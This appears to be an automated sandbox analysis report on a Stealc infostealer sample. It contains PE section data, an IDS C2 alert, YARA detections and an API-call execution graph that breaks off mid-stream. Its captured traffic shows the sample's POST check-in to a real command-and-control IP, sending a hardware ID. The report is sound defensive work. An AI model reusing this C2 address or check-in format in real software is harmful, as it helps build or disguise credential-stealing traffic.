                               IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
                               IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                               Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                               (unnamed) | 0x1000 | 0x25b000 | 0x22800 | 37e66ac48966f83a344852b047606034 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               .rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               .idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               (unnamed) | 0x25e000 | 0x297000 | 0x200 | 335005d3834a64c10ffbc5c88645f330 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               letztgfz | 0x4f5000 | 0x197000 | 0x196a00 | 1aac734bf41dc075c2085c934b45ed6e | False | 0.9949451708038733 | data | 7.95471366265782 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               rrfcshya | 0x68c000 | 0x1000 | 0x400 | 35a425c14942f3085636dad7b78272c7 | False | 0.7236328125 | data | 5.753655644270787 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               .taggant | 0x68d000 | 0x3000 | 0x2200 | 76d94384303b7bf70efd884750171af8 | False | 0.06192555147058824 | DOS executable (COM) | 0.680114413842498 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-24T18:08:02.054638+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 24, 2024 18:08:00.860810995 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 24, 2024 18:08:00.866451025 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 24, 2024 18:08:00.866548061 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 24, 2024 18:08:00.866677046 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 24, 2024 18:08:00.871953011 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 24, 2024 18:08:01.768033981 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 24, 2024 18:08:01.768134117 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 24, 2024 18:08:01.770798922 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 24, 2024 18:08:01.776114941 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 24, 2024 18:08:02.054524899 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 24, 2024 18:08:02.054637909 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 24, 2024 18:08:05.151302099 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                              • 185.215.113.37
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | 7348 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 18:08:00.866677046 CEST | 89 | OUT | GET / HTTP/1.1
Host: 185.215.113.37
Connection: Keep-Alive
Cache-Control: no-cache
Oct 24, 2024 18:08:01.768033981 CEST | 203 | IN | HTTP/1.1 200 OK
Date: Thu, 24 Oct 2024 16:08:01 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Oct 24, 2024 18:08:01.770798922 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DBGHJEBKJEGHJKECAAKJ
Host: 185.215.113.37
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 30 44 32 33 35 38 38 36 46 38 37 32 35 35 36 31 33 34 35 35 39 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 2d 2d 0d 0a
Data Ascii: ------DBGHJEBKJEGHJKECAAKJContent-Disposition: form-data; name="hwid"E0D235886F872556134559------DBGHJEBKJEGHJKECAAKJContent-Disposition: form-data; name="build"doma------DBGHJEBKJEGHJKECAAKJ--
Oct 24, 2024 18:08:02.054524899 CEST | 210 | IN | HTTP/1.1 200 OK
Date: Thu, 24 Oct 2024 16:08:01 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s=


                              Target ID:0
                              Start time:12:07:57
                              Start date:24/10/2024
                              Path:C:\Users\user\Desktop\file.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\file.exe"
                              Imagebase:0xdc0000
                              File size:1'821'696 bytes
                              MD5 hash:20A21EC73989A782B2B0243F0ED123BA
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1747910507.000000000160E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1705441818.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true


                                Execution Graph

                                Execution Coverage:8.2%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:10.1%
                                Total number of Nodes:2000
                                Total number of Limit Nodes:24
14507->14508 14509 dc45c0 2 API calls 14508->14509 14510 dc4513 14509->14510 14511 dc45c0 2 API calls 14510->14511 14512 dc452c 14511->14512 14513 dc45c0 2 API calls 14512->14513 14514 dc4545 14513->14514 14515 dc45c0 2 API calls 14514->14515 14516 dc455e 14515->14516 14517 dc45c0 2 API calls 14516->14517 14518 dc4577 14517->14518 14519 dc45c0 2 API calls 14518->14519 14520 dc4590 14519->14520 14521 dc45c0 2 API calls 14520->14521 14522 dc45a9 14521->14522 14523 dd9c10 14522->14523 14524 dda036 8 API calls 14523->14524 14525 dd9c20 43 API calls 14523->14525 14526 dda0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14524->14526 14527 dda146 14524->14527 14525->14524 14526->14527 14528 dda216 14527->14528 14529 dda153 8 API calls 14527->14529 14530 dda21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14528->14530 14531 dda298 14528->14531 14529->14528 14530->14531 14532 dda2a5 6 API calls 14531->14532 14533 dda337 14531->14533 14532->14533 14534 dda41f 14533->14534 14535 dda344 9 API calls 14533->14535 14536 dda428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14534->14536 14537 dda4a2 14534->14537 14535->14534 14536->14537 14538 dda4dc 14537->14538 14539 dda4ab GetProcAddress GetProcAddress 14537->14539 14540 dda515 14538->14540 14541 dda4e5 GetProcAddress GetProcAddress 14538->14541 14539->14538 14542 dda612 14540->14542 14543 dda522 10 API calls 14540->14543 14541->14540 14544 dda67d 14542->14544 14545 dda61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14542->14545 14543->14542 14546 dda69e 14544->14546 14547 dda686 GetProcAddress 14544->14547 14545->14544 14548 dd5ca3 14546->14548 14549 dda6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14546->14549 14547->14546 14550 dc1590 14548->14550 14549->14548 15671 dc1670 14550->15671 14553 dda7a0 lstrcpy 14554 dc15b5 14553->14554 14555 dda7a0 lstrcpy 14554->14555 14556 dc15c7 14555->14556 14557 dda7a0 
lstrcpy 14556->14557 14558 dc15d9 14557->14558 14559 dda7a0 lstrcpy 14558->14559 14560 dc1663 14559->14560 14561 dd5510 14560->14561 14562 dd5521 14561->14562 14563 dda820 2 API calls 14562->14563 14564 dd552e 14563->14564 14565 dda820 2 API calls 14564->14565 14566 dd553b 14565->14566 14567 dda820 2 API calls 14566->14567 14568 dd5548 14567->14568 14569 dda740 lstrcpy 14568->14569 14570 dd5555 14569->14570 14571 dda740 lstrcpy 14570->14571 14572 dd5562 14571->14572 14573 dda740 lstrcpy 14572->14573 14574 dd556f 14573->14574 14575 dda740 lstrcpy 14574->14575 14614 dd557c 14575->14614 14576 dd5643 StrCmpCA 14576->14614 14577 dd56a0 StrCmpCA 14578 dd57dc 14577->14578 14577->14614 14579 dda8a0 lstrcpy 14578->14579 14580 dd57e8 14579->14580 14581 dda820 2 API calls 14580->14581 14584 dd57f6 14581->14584 14582 dda820 lstrlen lstrcpy 14582->14614 14583 dd51f0 20 API calls 14583->14614 14586 dda820 2 API calls 14584->14586 14585 dd5856 StrCmpCA 14587 dd5991 14585->14587 14585->14614 14589 dd5805 14586->14589 14588 dda8a0 lstrcpy 14587->14588 14590 dd599d 14588->14590 14591 dc1670 lstrcpy 14589->14591 14592 dda820 2 API calls 14590->14592 14615 dd5811 14591->14615 14594 dd59ab 14592->14594 14593 dda740 lstrcpy 14593->14614 14596 dda820 2 API calls 14594->14596 14595 dd5a0b StrCmpCA 14597 dd5a28 14595->14597 14598 dd5a16 Sleep 14595->14598 14600 dd59ba 14596->14600 14601 dda8a0 lstrcpy 14597->14601 14598->14614 14599 dda7a0 lstrcpy 14599->14614 14602 dc1670 lstrcpy 14600->14602 14603 dd5a34 14601->14603 14602->14615 14604 dda820 2 API calls 14603->14604 14605 dd5a43 14604->14605 14607 dda820 2 API calls 14605->14607 14606 dd52c0 25 API calls 14606->14614 14608 dd5a52 14607->14608 14610 dc1670 lstrcpy 14608->14610 14609 dd578a StrCmpCA 14609->14614 14610->14615 14611 dc1590 lstrcpy 14611->14614 14612 dd593f StrCmpCA 14612->14614 14613 dda8a0 lstrcpy 14613->14614 14614->14576 14614->14577 14614->14582 14614->14583 14614->14585 14614->14593 14614->14595 14614->14599 
14614->14606 14614->14609 14614->14611 14614->14612 14614->14613 14615->13668 14617 dd754c 14616->14617 14618 dd7553 GetVolumeInformationA 14616->14618 14617->14618 14619 dd7591 14618->14619 14620 dd75fc GetProcessHeap RtlAllocateHeap 14619->14620 14621 dd7619 14620->14621 14622 dd7628 wsprintfA 14620->14622 14623 dda740 lstrcpy 14621->14623 14624 dda740 lstrcpy 14622->14624 14625 dd5da7 14623->14625 14624->14625 14625->13689 14627 dda7a0 lstrcpy 14626->14627 14628 dc4899 14627->14628 15680 dc47b0 14628->15680 14630 dc48a5 14631 dda740 lstrcpy 14630->14631 14632 dc48d7 14631->14632 14633 dda740 lstrcpy 14632->14633 14634 dc48e4 14633->14634 14635 dda740 lstrcpy 14634->14635 14636 dc48f1 14635->14636 14637 dda740 lstrcpy 14636->14637 14638 dc48fe 14637->14638 14639 dda740 lstrcpy 14638->14639 14640 dc490b InternetOpenA StrCmpCA 14639->14640 14641 dc4944 14640->14641 14642 dc4ecb InternetCloseHandle 14641->14642 15686 dd8b60 14641->15686 14644 dc4ee8 14642->14644 15701 dc9ac0 CryptStringToBinaryA 14644->15701 14645 dc4963 15694 dda920 14645->15694 14649 dc4976 14650 dda8a0 lstrcpy 14649->14650 14655 dc497f 14650->14655 14651 dda820 2 API calls 14652 dc4f05 14651->14652 14653 dda9b0 4 API calls 14652->14653 14656 dc4f1b 14653->14656 14654 dc4f27 codecvt 14657 dda7a0 lstrcpy 14654->14657 14659 dda9b0 4 API calls 14655->14659 14658 dda8a0 lstrcpy 14656->14658 14670 dc4f57 14657->14670 14658->14654 14660 dc49a9 14659->14660 14661 dda8a0 lstrcpy 14660->14661 14662 dc49b2 14661->14662 14663 dda9b0 4 API calls 14662->14663 14664 dc49d1 14663->14664 14665 dda8a0 lstrcpy 14664->14665 14666 dc49da 14665->14666 14667 dda920 3 API calls 14666->14667 14668 dc49f8 14667->14668 14669 dda8a0 lstrcpy 14668->14669 14671 dc4a01 14669->14671 14670->13692 14672 dda9b0 4 API calls 14671->14672 14673 dc4a20 14672->14673 14674 dda8a0 lstrcpy 14673->14674 14675 dc4a29 14674->14675 14676 dda9b0 4 API calls 14675->14676 14677 dc4a48 14676->14677 14678 dda8a0 lstrcpy 14677->14678 14679 dc4a51 
14678->14679 14680 dda9b0 4 API calls 14679->14680 14681 dc4a7d 14680->14681 14682 dda920 3 API calls 14681->14682 14683 dc4a84 14682->14683 14684 dda8a0 lstrcpy 14683->14684 14685 dc4a8d 14684->14685 14686 dc4aa3 InternetConnectA 14685->14686 14686->14642 14687 dc4ad3 HttpOpenRequestA 14686->14687 14689 dc4ebe InternetCloseHandle 14687->14689 14690 dc4b28 14687->14690 14689->14642 14691 dda9b0 4 API calls 14690->14691 14692 dc4b3c 14691->14692 14693 dda8a0 lstrcpy 14692->14693 14694 dc4b45 14693->14694 14695 dda920 3 API calls 14694->14695 14696 dc4b63 14695->14696 14697 dda8a0 lstrcpy 14696->14697 14698 dc4b6c 14697->14698 14699 dda9b0 4 API calls 14698->14699 14700 dc4b8b 14699->14700 14701 dda8a0 lstrcpy 14700->14701 14702 dc4b94 14701->14702 14703 dda9b0 4 API calls 14702->14703 14704 dc4bb5 14703->14704 14705 dda8a0 lstrcpy 14704->14705 14706 dc4bbe 14705->14706 14707 dda9b0 4 API calls 14706->14707 14708 dc4bde 14707->14708 14709 dda8a0 lstrcpy 14708->14709 14710 dc4be7 14709->14710 14711 dda9b0 4 API calls 14710->14711 14712 dc4c06 14711->14712 14713 dda8a0 lstrcpy 14712->14713 14714 dc4c0f 14713->14714 14715 dda920 3 API calls 14714->14715 14716 dc4c2d 14715->14716 14717 dda8a0 lstrcpy 14716->14717 14718 dc4c36 14717->14718 14719 dda9b0 4 API calls 14718->14719 14720 dc4c55 14719->14720 14721 dda8a0 lstrcpy 14720->14721 14722 dc4c5e 14721->14722 14723 dda9b0 4 API calls 14722->14723 14724 dc4c7d 14723->14724 14725 dda8a0 lstrcpy 14724->14725 14726 dc4c86 14725->14726 14727 dda920 3 API calls 14726->14727 14728 dc4ca4 14727->14728 14729 dda8a0 lstrcpy 14728->14729 14730 dc4cad 14729->14730 14731 dda9b0 4 API calls 14730->14731 14732 dc4ccc 14731->14732 14733 dda8a0 lstrcpy 14732->14733 14734 dc4cd5 14733->14734 14735 dda9b0 4 API calls 14734->14735 14736 dc4cf6 14735->14736 14737 dda8a0 lstrcpy 14736->14737 14738 dc4cff 14737->14738 14739 dda9b0 4 API calls 14738->14739 14740 dc4d1f 14739->14740 14741 dda8a0 lstrcpy 14740->14741 14742 dc4d28 14741->14742 
14743 dda9b0 4 API calls 14742->14743 14744 dc4d47 14743->14744 14745 dda8a0 lstrcpy 14744->14745 14746 dc4d50 14745->14746 14747 dda920 3 API calls 14746->14747 14748 dc4d6e 14747->14748 14749 dda8a0 lstrcpy 14748->14749 14750 dc4d77 14749->14750 14751 dda740 lstrcpy 14750->14751 14752 dc4d92 14751->14752 14753 dda920 3 API calls 14752->14753 14754 dc4db3 14753->14754 14755 dda920 3 API calls 14754->14755 14756 dc4dba 14755->14756 14757 dda8a0 lstrcpy 14756->14757 14758 dc4dc6 14757->14758 14759 dc4de7 lstrlen 14758->14759 14760 dc4dfa 14759->14760 14761 dc4e03 lstrlen 14760->14761 15700 ddaad0 14761->15700 14763 dc4e13 HttpSendRequestA 14764 dc4e32 InternetReadFile 14763->14764 14765 dc4e67 InternetCloseHandle 14764->14765 14770 dc4e5e 14764->14770 14768 dda800 14765->14768 14767 dda9b0 4 API calls 14767->14770 14768->14689 14769 dda8a0 lstrcpy 14769->14770 14770->14764 14770->14765 14770->14767 14770->14769 15707 ddaad0 14771->15707 14773 dd17c4 StrCmpCA 14774 dd17cf ExitProcess 14773->14774 14776 dd17d7 14773->14776 14775 dd19c2 14775->13694 14776->14775 14777 dd185d StrCmpCA 14776->14777 14778 dd187f StrCmpCA 14776->14778 14779 dd18f1 StrCmpCA 14776->14779 14780 dd1951 StrCmpCA 14776->14780 14781 dd1970 StrCmpCA 14776->14781 14782 dd1913 StrCmpCA 14776->14782 14783 dd1932 StrCmpCA 14776->14783 14784 dd18ad StrCmpCA 14776->14784 14785 dd18cf StrCmpCA 14776->14785 14786 dda820 lstrlen lstrcpy 14776->14786 14777->14776 14778->14776 14779->14776 14780->14776 14781->14776 14782->14776 14783->14776 14784->14776 14785->14776 14786->14776 14788 dda7a0 lstrcpy 14787->14788 14789 dc5979 14788->14789 14790 dc47b0 2 API calls 14789->14790 14791 dc5985 14790->14791 14792 dda740 lstrcpy 14791->14792 14793 dc59ba 14792->14793 14794 dda740 lstrcpy 14793->14794 14795 dc59c7 14794->14795 14796 dda740 lstrcpy 14795->14796 14797 dc59d4 14796->14797 14798 dda740 lstrcpy 14797->14798 14799 dc59e1 14798->14799 14800 dda740 lstrcpy 14799->14800 14801 dc59ee InternetOpenA StrCmpCA 
14800->14801 14802 dc5a1d 14801->14802 14803 dc5fc3 InternetCloseHandle 14802->14803 14804 dd8b60 3 API calls 14802->14804 14805 dc5fe0 14803->14805 14806 dc5a3c 14804->14806 14808 dc9ac0 4 API calls 14805->14808 14807 dda920 3 API calls 14806->14807 14809 dc5a4f 14807->14809 14810 dc5fe6 14808->14810 14811 dda8a0 lstrcpy 14809->14811 14812 dda820 2 API calls 14810->14812 14814 dc601f codecvt 14810->14814 14817 dc5a58 14811->14817 14813 dc5ffd 14812->14813 14815 dda9b0 4 API calls 14813->14815 14819 dda7a0 lstrcpy 14814->14819 14816 dc6013 14815->14816 14818 dda8a0 lstrcpy 14816->14818 14820 dda9b0 4 API calls 14817->14820 14818->14814 14828 dc604f 14819->14828 14821 dc5a82 14820->14821 14822 dda8a0 lstrcpy 14821->14822 14823 dc5a8b 14822->14823 14824 dda9b0 4 API calls 14823->14824 14825 dc5aaa 14824->14825 14826 dda8a0 lstrcpy 14825->14826 14827 dc5ab3 14826->14827 14829 dda920 3 API calls 14827->14829 14828->13700 14830 dc5ad1 14829->14830 14831 dda8a0 lstrcpy 14830->14831 14832 dc5ada 14831->14832 14833 dda9b0 4 API calls 14832->14833 14834 dc5af9 14833->14834 14835 dda8a0 lstrcpy 14834->14835 14836 dc5b02 14835->14836 14837 dda9b0 4 API calls 14836->14837 14838 dc5b21 14837->14838 14839 dda8a0 lstrcpy 14838->14839 14840 dc5b2a 14839->14840 14841 dda9b0 4 API calls 14840->14841 14842 dc5b56 14841->14842 14843 dda920 3 API calls 14842->14843 14844 dc5b5d 14843->14844 14845 dda8a0 lstrcpy 14844->14845 14846 dc5b66 14845->14846 14847 dc5b7c InternetConnectA 14846->14847 14847->14803 14848 dc5bac HttpOpenRequestA 14847->14848 14850 dc5c0b 14848->14850 14851 dc5fb6 InternetCloseHandle 14848->14851 14852 dda9b0 4 API calls 14850->14852 14851->14803 14853 dc5c1f 14852->14853 14854 dda8a0 lstrcpy 14853->14854 14855 dc5c28 14854->14855 14856 dda920 3 API calls 14855->14856 14857 dc5c46 14856->14857 14858 dda8a0 lstrcpy 14857->14858 14859 dc5c4f 14858->14859 14860 dda9b0 4 API calls 14859->14860 14861 dc5c6e 14860->14861 14862 dda8a0 lstrcpy 14861->14862 14863 dc5c77 
14862->14863 14864 dda9b0 4 API calls 14863->14864 14865 dc5c98 14864->14865 14866 dda8a0 lstrcpy 14865->14866 14867 dc5ca1 14866->14867 14868 dda9b0 4 API calls 14867->14868 14869 dc5cc1 14868->14869 14870 dda8a0 lstrcpy 14869->14870 14871 dc5cca 14870->14871 14872 dda9b0 4 API calls 14871->14872 14873 dc5ce9 14872->14873 14874 dda8a0 lstrcpy 14873->14874 14875 dc5cf2 14874->14875 14876 dda920 3 API calls 14875->14876 14877 dc5d10 14876->14877 14878 dda8a0 lstrcpy 14877->14878 14879 dc5d19 14878->14879 14880 dda9b0 4 API calls 14879->14880 14881 dc5d38 14880->14881 14882 dda8a0 lstrcpy 14881->14882 14883 dc5d41 14882->14883 14884 dda9b0 4 API calls 14883->14884 14885 dc5d60 14884->14885 14886 dda8a0 lstrcpy 14885->14886 14887 dc5d69 14886->14887 14888 dda920 3 API calls 14887->14888 14889 dc5d87 14888->14889 14890 dda8a0 lstrcpy 14889->14890 14891 dc5d90 14890->14891 14892 dda9b0 4 API calls 14891->14892 14893 dc5daf 14892->14893 14894 dda8a0 lstrcpy 14893->14894 14895 dc5db8 14894->14895 14896 dda9b0 4 API calls 14895->14896 14897 dc5dd9 14896->14897 14898 dda8a0 lstrcpy 14897->14898 14899 dc5de2 14898->14899 14900 dda9b0 4 API calls 14899->14900 14901 dc5e02 14900->14901 14902 dda8a0 lstrcpy 14901->14902 14903 dc5e0b 14902->14903 14904 dda9b0 4 API calls 14903->14904 14905 dc5e2a 14904->14905 14906 dda8a0 lstrcpy 14905->14906 14907 dc5e33 14906->14907 14908 dda920 3 API calls 14907->14908 14909 dc5e54 14908->14909 14910 dda8a0 lstrcpy 14909->14910 14911 dc5e5d 14910->14911 14912 dc5e70 lstrlen 14911->14912 15708 ddaad0 14912->15708 14914 dc5e81 lstrlen GetProcessHeap RtlAllocateHeap 15709 ddaad0 14914->15709 14916 dc5eae lstrlen 14917 dc5ebe 14916->14917 14918 dc5ed7 lstrlen 14917->14918 14919 dc5ee7 14918->14919 14920 dc5ef0 lstrlen 14919->14920 14921 dc5f03 14920->14921 14922 dc5f1a lstrlen 14921->14922 15710 ddaad0 14922->15710 14924 dc5f2a HttpSendRequestA 14925 dc5f35 InternetReadFile 14924->14925 14926 dc5f6a InternetCloseHandle 14925->14926 14930 dc5f61 
14925->14930 14926->14851 14928 dda9b0 4 API calls 14928->14930 14929 dda8a0 lstrcpy 14929->14930 14930->14925 14930->14926 14930->14928 14930->14929 14933 dd1077 14931->14933 14932 dd1151 14932->13702 14933->14932 14934 dda820 lstrlen lstrcpy 14933->14934 14934->14933 14937 dd0db7 14935->14937 14936 dd0f17 14936->13710 14937->14936 14938 dd0ea4 StrCmpCA 14937->14938 14939 dd0e27 StrCmpCA 14937->14939 14940 dd0e67 StrCmpCA 14937->14940 14941 dda820 lstrlen lstrcpy 14937->14941 14938->14937 14939->14937 14940->14937 14941->14937 14943 dd0f67 14942->14943 14944 dd1044 14943->14944 14945 dd0fb2 StrCmpCA 14943->14945 14946 dda820 lstrlen lstrcpy 14943->14946 14944->13718 14945->14943 14946->14943 14948 dda740 lstrcpy 14947->14948 14949 dd1a26 14948->14949 14950 dda9b0 4 API calls 14949->14950 14951 dd1a37 14950->14951 14952 dda8a0 lstrcpy 14951->14952 14953 dd1a40 14952->14953 14954 dda9b0 4 API calls 14953->14954 14955 dd1a5b 14954->14955 14956 dda8a0 lstrcpy 14955->14956 14957 dd1a64 14956->14957 14958 dda9b0 4 API calls 14957->14958 14959 dd1a7d 14958->14959 14960 dda8a0 lstrcpy 14959->14960 14961 dd1a86 14960->14961 14962 dda9b0 4 API calls 14961->14962 14963 dd1aa1 14962->14963 14964 dda8a0 lstrcpy 14963->14964 14965 dd1aaa 14964->14965 14966 dda9b0 4 API calls 14965->14966 14967 dd1ac3 14966->14967 14968 dda8a0 lstrcpy 14967->14968 14969 dd1acc 14968->14969 14970 dda9b0 4 API calls 14969->14970 14971 dd1ae7 14970->14971 14972 dda8a0 lstrcpy 14971->14972 14973 dd1af0 14972->14973 14974 dda9b0 4 API calls 14973->14974 14975 dd1b09 14974->14975 14976 dda8a0 lstrcpy 14975->14976 14977 dd1b12 14976->14977 14978 dda9b0 4 API calls 14977->14978 14979 dd1b2d 14978->14979 14980 dda8a0 lstrcpy 14979->14980 14981 dd1b36 14980->14981 14982 dda9b0 4 API calls 14981->14982 14983 dd1b4f 14982->14983 14984 dda8a0 lstrcpy 14983->14984 14985 dd1b58 14984->14985 14986 dda9b0 4 API calls 14985->14986 14987 dd1b76 14986->14987 14988 dda8a0 lstrcpy 14987->14988 14989 dd1b7f 
14988->14989 14990 dd7500 6 API calls 14989->14990 14991 dd1b96 14990->14991 14992 dda920 3 API calls 14991->14992 14993 dd1ba9 14992->14993 14994 dda8a0 lstrcpy 14993->14994 14995 dd1bb2 14994->14995 14996 dda9b0 4 API calls 14995->14996 14997 dd1bdc 14996->14997 14998 dda8a0 lstrcpy 14997->14998 14999 dd1be5 14998->14999 15000 dda9b0 4 API calls 14999->15000 15001 dd1c05 15000->15001 15002 dda8a0 lstrcpy 15001->15002 15003 dd1c0e 15002->15003 15711 dd7690 GetProcessHeap RtlAllocateHeap 15003->15711 15006 dda9b0 4 API calls 15007 dd1c2e 15006->15007 15008 dda8a0 lstrcpy 15007->15008 15009 dd1c37 15008->15009 15010 dda9b0 4 API calls 15009->15010 15011 dd1c56 15010->15011 15012 dda8a0 lstrcpy 15011->15012 15013 dd1c5f 15012->15013 15014 dda9b0 4 API calls 15013->15014 15015 dd1c80 15014->15015 15016 dda8a0 lstrcpy 15015->15016 15017 dd1c89 15016->15017 15718 dd77c0 GetCurrentProcess IsWow64Process 15017->15718 15020 dda9b0 4 API calls 15021 dd1ca9 15020->15021 15022 dda8a0 lstrcpy 15021->15022 15023 dd1cb2 15022->15023 15024 dda9b0 4 API calls 15023->15024 15025 dd1cd1 15024->15025 15026 dda8a0 lstrcpy 15025->15026 15027 dd1cda 15026->15027 15028 dda9b0 4 API calls 15027->15028 15029 dd1cfb 15028->15029 15030 dda8a0 lstrcpy 15029->15030 15031 dd1d04 15030->15031 15032 dd7850 3 API calls 15031->15032 15033 dd1d14 15032->15033 15034 dda9b0 4 API calls 15033->15034 15035 dd1d24 15034->15035 15036 dda8a0 lstrcpy 15035->15036 15037 dd1d2d 15036->15037 15038 dda9b0 4 API calls 15037->15038 15039 dd1d4c 15038->15039 15040 dda8a0 lstrcpy 15039->15040 15041 dd1d55 15040->15041 15042 dda9b0 4 API calls 15041->15042 15043 dd1d75 15042->15043 15044 dda8a0 lstrcpy 15043->15044 15045 dd1d7e 15044->15045 15046 dd78e0 3 API calls 15045->15046 15047 dd1d8e 15046->15047 15048 dda9b0 4 API calls 15047->15048 15049 dd1d9e 15048->15049 15050 dda8a0 lstrcpy 15049->15050 15051 dd1da7 15050->15051 15052 dda9b0 4 API calls 15051->15052 15053 dd1dc6 15052->15053 15054 dda8a0 lstrcpy 
